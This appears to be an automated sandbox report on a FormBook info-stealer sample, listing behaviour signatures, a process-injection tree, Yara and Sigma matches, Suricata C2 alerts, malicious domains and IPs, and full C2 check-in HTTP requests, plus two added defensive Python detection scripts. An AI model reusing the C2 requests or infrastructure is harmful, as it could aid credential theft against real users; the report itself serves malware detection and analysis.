Windows Analysis Report
8EhMjL3yNF.exe

Overview

General Information

Sample name: 8EhMjL3yNF.exe
Analysis ID: 1529811
MD5: adf7951566b1bb643b3fc555987cbddc
SHA1: 29d6e8e48400e531e35b129781528dd3f10fc08b
SHA256: 84ced43584331241219ef94bb7d214d96f1c5f4fdbc9adc0bb9d5fcd5cb0f27c

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • 8EhMjL3yNF.exe (PID: 8400 cmdline: "C:\Users\user\Desktop\8EhMjL3yNF.exe" MD5: ADF7951566B1BB643B3FC555987CBDDC)
    • svchost.exe (PID: 8580 cmdline: "C:\Users\user\Desktop\8EhMjL3yNF.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • SjhnWvlTMw.exe (PID: 6828 cmdline: "C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • choice.exe (PID: 5492 cmdline: "C:\Windows\SysWOW64\choice.exe" MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
          • SjhnWvlTMw.exe (PID: 6156 cmdline: "C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7044 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 7B12552FD2A5948256B20EC97B708F94)
  • cleanup
No configs have been found
Memory Dumps (9 entries in the full report; the ones visible on this page follow)

Source | Rule | Description | Author
00000004.00000002.708578550328.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x83d2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ba60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ba60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Unpacked PEs

Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e153:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ef53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17062:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
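The two hex strings printed for Windows_Trojan_Formbook_1112e116 can be searched for directly in a dumped region, either to confirm a hit or to triage a dump taken on another host. The scanner below is an added example written by the editor; it is not Joe Sandbox code and not the rule itself. It knows only the two strings shown on this page (the rule's remaining strings and its condition are not reproduced here), the `??` wildcard handling is YARA hex-string syntax that these two strings happen not to use, and the buffer it scans is a constructed byte string rather than a dump from this analysis.

```python
"""Locate the report's Yara hex strings in a memory dump (added example)."""
import re
from typing import Dict, List, Pattern, Tuple

# Hex strings exactly as printed in the report for Windows_Trojan_Formbook_1112e116.
# Only $a2 and $a3 are on the page; the rule's other strings and its condition are not.
REPORT_STRINGS: Dict[str, str] = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}


def compile_hex_string(hex_string: str) -> Pattern[bytes]:
    """Turn a YARA-style hex string into a bytes regex.

    Every token is one hex byte; "??" is YARA's single-byte wildcard.  The two
    strings above contain no wildcard, but a scanner that cannot handle one is
    useless for most real rules, so it is supported here.
    """
    parts = []
    for token in hex_string.split():
        if token == "??":
            parts.append(b".")
        else:
            parts.append(re.escape(bytes([int(token, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buffer: bytes, strings: Dict[str, str] = REPORT_STRINGS) -> List[Tuple[int, str]]:
    """Return (offset, identifier) for every occurrence of every string, sorted by offset."""
    hits: List[Tuple[int, str]] = []
    for name, hex_string in strings.items():
        pattern = compile_hex_string(hex_string)
        pos = 0
        while True:
            match = pattern.search(buffer, pos)
            if match is None:
                break
            hits.append((match.start(), name))
            pos = match.start() + 1  # restart one byte later so overlapping hits are not lost
    return sorted(hits)


def format_hits(hits: List[Tuple[int, str]]) -> List[str]:
    """Render hits the way the report does, e.g. '0x2ba60:$a2'."""
    return [f"0x{offset:x}:{name}" for offset, name in hits]


def scan_file(path: str) -> List[str]:
    """Scan a .sdmp or unpacked PE saved from the sandbox (whole file read at once)."""
    with open(path, "rb") as handle:
        return format_hits(scan(handle.read()))


# Constructed dump: filler bytes with the two report strings at known offsets
# (0x20 and 0x44).  A real run would call scan_file() on a dump instead.
CONSTRUCTED_DUMP = (
    b"\x90" * 0x20
    + bytes.fromhex(REPORT_STRINGS["$a2"])
    + b"\xcc" * 0x10
    + bytes.fromhex(REPORT_STRINGS["$a3"])
    + b"\x00" * 0x10
)

if __name__ == "__main__":
    for line in format_hits(scan(CONSTRUCTED_DUMP)):
        print(line)
```

A hit on these two byte sequences alone is not equivalent to the rule firing; YARA evaluates the rule's condition over all of its strings, so treat the offsets as a pointer to where to look in the dump, not as a verdict.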

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\8EhMjL3yNF.exe", CommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", ParentImage: C:\Users\user\Desktop\8EhMjL3yNF.exe, ParentProcessId: 8400, ParentProcessName: 8EhMjL3yNF.exe, ProcessCommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", ProcessId: 8580, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\8EhMjL3yNF.exe", CommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", ParentImage: C:\Users\user\Desktop\8EhMjL3yNF.exe, ParentProcessId: 8400, ParentProcessName: 8EhMjL3yNF.exe, ProcessCommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", ProcessId: 8580, ProcessName: svchost.exe
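Both Sigma rows describe one process-creation event: the image is svchost.exe, but the parent is the sample and the command line still names the sample's own path. The script below is an added example by the editor, not Joe Sandbox code and not the Sigma rules themselves. It applies three checks to that event: the allow-list of expected svchost.exe parents is an approximation of the filter in the public Sigma rule "Uncommon Svchost Parent Process" (assumption; the real rule may list more), while the missing `-k <group>` argument and the mismatch between argv[0] and the image are the editor's own heuristics read off the event. The PID 1234 event is constructed as a benign counterpart.

```python
"""Three checks against the svchost.exe start recorded in the report (added example)."""
import ntpath
from typing import Dict, List

# Assumption: approximation of the parent images the Sigma rule
# "Uncommon Svchost Parent Process" filters out as normal.
EXPECTED_SVCHOST_PARENTS = {
    "services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe",
    "svchost.exe", "ngen.exe", "tiworker.exe",
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def argv0(cmdline: str) -> str:
    """First token of a Windows command line, honouring a double-quoted program path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def analyze(event: Dict[str, str]) -> List[str]:
    """Return one reason per suspicious property of a process-creation event."""
    reasons: List[str] = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")

    if image == "svchost.exe":
        # Check 1: the Sigma logic, svchost.exe started by something other than the service host's usual parents.
        if parent not in EXPECTED_SVCHOST_PARENTS:
            reasons.append(f"svchost.exe started by uncommon parent {parent!r}")
        # Check 2 (editor's heuristic): a real service host is always given a -k <group> argument.
        if "-k" not in cmdline.split():
            reasons.append("svchost.exe without a -k <group> argument")

    # Check 3 (editor's heuristic): the command line should name the image that is running.
    claimed = basename(argv0(cmdline))
    if claimed and claimed != image:
        reasons.append(f"command line names {claimed!r} but image is {image!r}")
    return reasons


def run(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map ProcessId -> reasons for every event; an empty list means nothing flagged."""
    return {int(e["ProcessId"]): analyze(e) for e in events}


# The first event is the one printed in the report's Sigma rows (PID 8580);
# the second is a constructed benign service-host start for comparison.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {
        "ProcessId": "8580",
        "Image": r"C:\Windows\SysWOW64\svchost.exe",
        "CommandLine": r'"C:\Users\user\Desktop\8EhMjL3yNF.exe"',
        "ParentProcessId": "8400",
        "ParentImage": r"C:\Users\user\Desktop\8EhMjL3yNF.exe",
        "ParentCommandLine": r'"C:\Users\user\Desktop\8EhMjL3yNF.exe"',
    },
    {
        "ProcessId": "1234",  # constructed
        "Image": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
        "ParentProcessId": "700",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "ParentCommandLine": r"C:\Windows\system32\services.exe",
    },
]

if __name__ == "__main__":
    for pid, reasons in run(SAMPLE_EVENTS).items():
        print(pid, reasons or "nothing flagged")
```

The third check is the cheapest of the three to run fleet-wide and is independent of svchost.exe: any image whose command line's first token names a different binary was created through CreateProcess with a separate lpApplicationName, which legitimate software rarely does and process-hollowing loaders do routinely.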
Timestamp                       | SID     | Severity | Classtype                                     | Source IP     | Source Port | Destination IP  | Destination Port | Protocol
2024-10-09T13:02:39.509624+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49820       | 85.159.66.93    | 80               | TCP
2024-10-09T13:02:52.764900+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49824       | 13.248.169.48   | 80               | TCP
2024-10-09T13:03:09.672799+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49829       | 103.255.237.233 | 80               | TCP
2024-10-09T13:03:22.910634+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49833       | 104.21.77.69    | 80               | TCP
2024-10-09T13:03:37.015594+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49837       | 65.21.196.90    | 80               | TCP
2024-10-09T13:03:51.267544+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49841       | 3.33.130.190    | 80               | TCP
2024-10-09T13:04:04.522902+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49845       | 3.33.130.190    | 80               | TCP
2024-10-09T13:04:17.750385+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49849       | 199.59.243.227  | 80               | TCP
2024-10-09T13:04:31.285707+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49853       | 45.56.219.238   | 80               | TCP
2024-10-09T13:04:44.910690+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49857       | 162.0.238.43    | 80               | TCP
2024-10-09T13:04:58.271235+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49861       | 23.227.38.74    | 80               | TCP
2024-10-09T13:05:11.747519+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49865       | 84.32.84.32     | 80               | TCP
2024-10-09T13:05:25.377801+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49869       | 54.67.42.145    | 80               | TCP
2024-10-09T13:05:45.583958+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49873       | 3.33.130.190    | 80               | TCP
2024-10-09T13:05:59.785367+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49877       | 81.2.196.19     | 80               | TCP
2024-10-09T13:06:13.274403+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49881       | 84.32.84.32     | 80               | TCP
2024-10-09T13:07:21.807766+0200 | 2050745 | 1        | Malware Command and Control Activity Detected | 192.168.11.30 | 49882       | 85.159.66.93    | 80               | TCP

AV Detection

Source: 8EhMjL3yNF.exe | Avira: detected
Source: 8EhMjL3yNF.exe | ReversingLabs: Detection: 57%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: 8EhMjL3yNF.exe | Joe Sandbox ML: detected
Source: 8EhMjL3yNF.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000002.00000003.705345811797.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705345727655.000000000301A000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000003.707411095047.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SjhnWvlTMw.exe, 00000004.00000002.708576351890.0000000000D1E000.00000002.00000001.01000000.00000004.sdmp, SjhnWvlTMw.exe, 00000006.00000000.705443693958.0000000000D1E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: 8EhMjL3yNF.exe, 00000000.00000003.703520236870.0000000004800000.00000004.00001000.00020000.00000000.sdmp, 8EhMjL3yNF.exe, 00000000.00000003.703518152149.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705288151288.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705284845460.0000000003200000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.0000000004F70000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.000000000509D000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705377011026.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705380810389.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 8EhMjL3yNF.exe, 00000000.00000003.703520236870.0000000004800000.00000004.00001000.00020000.00000000.sdmp, 8EhMjL3yNF.exe, 00000000.00000003.703518152149.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.705378005011.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705288151288.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705284845460.0000000003200000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.0000000004F70000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.000000000509D000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705377011026.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705380810389.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: choice.exe, 00000005.00000002.708581961090.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.705676368924.000000003C50C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: choice.exe, 00000005.00000002.708581961090.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.705676368924.000000003C50C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: choice.pdb source: svchost.exe, 00000002.00000003.705345811797.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705345727655.000000000301A000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000003.707411095047.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_004788BD
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0044BD27 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_0044BF8B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49820 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49833 -> 104.21.77.69:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49829 -> 103.255.237.233:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49869 -> 54.67.42.145:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49853 -> 45.56.219.238:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49873 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49837 -> 65.21.196.90:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49845 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49881 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49861 -> 23.227.38.74:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49849 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49857 -> 162.0.238.43:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49824 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49877 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49841 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49882 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49865 -> 84.32.84.32:80
Source: DNS query: www.sealofsea.xyz
Source: DNS query: www.languyenthuyduyen.xyz
Source: DNS query: www.languyenthuyduyen.xyz
Source: DNS query: www.languyenthuyduyen.xyz
Source: DNS query: www.030002304.xyz
Source: DNS query: www.allpop.xyz
Source: Joe Sandbox View | IP Address: 162.0.238.43 162.0.238.43
Source: Joe Sandbox View | IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View | ASN Name: CP-ASDE CP-ASDE
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\8EhMjL3yNF.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
Source: global traffic | HTTP traffic detected: GET /a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.sealofsea.xyz | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /2mvq/?nhl=1f2PLfbNsy8M3I94WxoJl+9LYulGMAhL6bYQCSgue7sU5iqO1AF0cOPb0dC3I0oleuEStANR5nkVNI8wgo80xQsJJPMBV5KAM01zlXNY2uMRUF4H75UghTg=&9X=EvKH2xeP-DpP307P HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.firstcry.shop | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /zxna/?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2VdCpkOUvznzx121WAOLhD3akGih7YK2UBiYRo2lJdrH1gL64cuqcjDePyZUHX/QJDU8k+qCwrYmvEQGfXWN0kwHy8MBDYStPNdJHxaZ4= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.languyenthuyduyen.xyz | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
